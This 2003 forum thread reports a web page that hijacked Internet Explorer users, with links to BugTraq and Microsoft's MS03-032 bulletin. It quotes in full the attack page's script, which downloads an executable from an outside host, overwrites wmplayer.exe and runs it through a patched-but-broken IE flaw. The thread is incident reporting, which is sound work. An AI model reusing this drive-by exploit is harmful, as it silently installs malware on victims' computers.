AIM Password theft

My apologies if this is in the wrong furum, I couldn't decide where to post.

There has been only one reply to the incidents mailing list, and I'm wondering if you folks could provide any insights. I have additional e-mails describing the problem, if anyone's interested.

curious

corn

------------email to follow----------------
Mark,
The code you just sent looks familiar to a SPAM I received
attempting to hijack users' e-gold accounts. Out of curiosity I
followed that link which loaded start.html (attached). What worries me
is that I'm running IE 6.0.2800.1106 with all the latest patches from
Microsoft and this page (start.html) rewrote wmplayer.exe on my local
drive without notice. After closing the page, I found two .exe files on
my desktop (which loaded from http://doz.linux162.onway.net/eg/1.exe).
Is this a new unknown vulnerability?

Brent Meshier
Global Transport Logistics, Inc.
http://www.gtlogistics.com/
"Innovative Fulfillment Solutions"

-----Original Message-----
From: Mark Coleman [mailto:[email protected]]
Sent: Tuesday, September 23, 2003 11:43 AM
To: [email protected]
Subject: [Fwd: Re: AIM Password theft]

Hi, can anyone shed some light on this for me? If this is new, its
going to spread like wildfire. AOL or incidents lists have yet to
reply.... it appears to be a legitimate threat as I have at least one
user "infected" already.. Thank you..

-Mark Coleman



<script language="vbs">
self.MoveTo 5000,5000
</script>
<object data="1.php"></object>

<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://doz.linux162.onway.net/eg/1.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

</textarea>

<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}


window.open("error.jsp","_media");

setTimeout("doit()", 5000);


</script>

There have been several more replies discussing it...

http://www.securityfocus.com/archive/1

Yeah, this has been kicked around BugTraq for a few days now. From what I remember, the patch that is supposed to fix the Data Object issue does not work. MS made a public announcement of this on the main page of the download section. Something about testing the claims that the patch is claimed to be broken and they will release a new one if they can confirm the claim.

Here is the link and a snip from the page:
"Microsoft originally issued this bulletin on August 20th, 2003. Subsequent to issuing the security bulletin, Microsoft received reports that the patch provided with this bulletin does not properly correct the Object Type Vulnerability (CAN-2003-0532)."

http://www.microsoft.com/technet/tre...n/MS03-032.asp
See the technical details section.

Then there is the actual bulletin:
http://www.microsoft.com/security/se...s/ms03-032.asp